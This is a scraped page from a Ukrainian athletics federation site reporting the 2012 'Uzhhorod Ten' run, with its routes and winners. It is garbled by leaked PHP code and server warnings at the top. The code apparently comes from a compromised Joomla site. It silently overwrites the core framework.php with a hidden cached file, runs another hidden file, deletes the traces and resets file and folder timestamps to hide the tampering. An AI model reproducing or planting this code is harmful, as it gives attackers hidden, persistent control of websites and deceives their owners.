$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 426
Ужгородька 10 | ФЕДЕРАЦІЯ ЛЕГКОЇ АТЛЕТИКИ УЖГОРОДА

 

Ужгородька 10

 

29 вересня в Ужгороді відбувся
спортивний фестиваль «Ужгородська десятка 2012″.

Стартували учасники о 10.00 з площі Театральної. Проведення такого формату конкурсів та змагань свідчить про позитивні тенденції в суспільстві.

«Ужгородська десятка» в Ужгороді проходить вже втретє. Метою данного заходу є популяризації легкої атлетики серед населення області та України, пропаганда здорового способу життя, зміцнення дружби між державами та прикордонними областями.

Прийняти участь у змаганнях могли всі бажаючі, яки долучилися до цього спортивного заходу та вчасно пройшли реєстрацію. Цього року більше сотні спортсменів взяли участь у забігу на різні дистанції. Серед учасників найбільше було дітей. Також в забігу брали участь студенти, спортсмени, просто бажаючі корисно провести час, серед присутніх були як ужгородці так і гості інших міст.
 Проводилися забіги на дистанції  2 км (юнаки та дівчата до 14 років), 6км (жінки) та 10км (чоловіки), маршрут яких було прокладено через набережні міста та 2 мости — пішохідний мост, та транспортний міст імені Масарика.

Відбувся старт людей  з обмеженими фізичними можливостями, в яких був інший маршрут який пролягав з площі Театральої, через вулицю Корзо, Волошина, пасаж та фініш на площі Театральній.

Окрім учасників на площі зібралося багато глядачів. Для наймолодших глядачів була створена локація, на якій дітки разом з батьками та волонтерами розвивали свої творчі здібності.
Переможці та призери  змагань :

чоловіки

1-Гапак Едуард          Ужгород
2-Малий Анатолій       Ужгород
3-Пузанов Ігор          Мукачево

жінки

1-Малая Наталія          Ужгород
2-Рожко Андріана       Мукачево
3-Мартиненко Марина  Ужгород

юнаки

1-Брилинський Сергій    Ужгород
2-Кручаниця Василь   Мукачівський р-н с. Лецовиця
3-Андрейкович Віктор Ужгород

дівчата

1-Рахманова Лоліта Ужгород
2-Погань Елеонора Ужгород

 

 

 

фото Н.Новікова

Відео на http://www.youtube.com/watch?v=7htDcLawWEE

 

 

 
ГОЛОВНА НОВИНИ новини Ужгородька 10
'Flauz' интернет магазин спортивного питания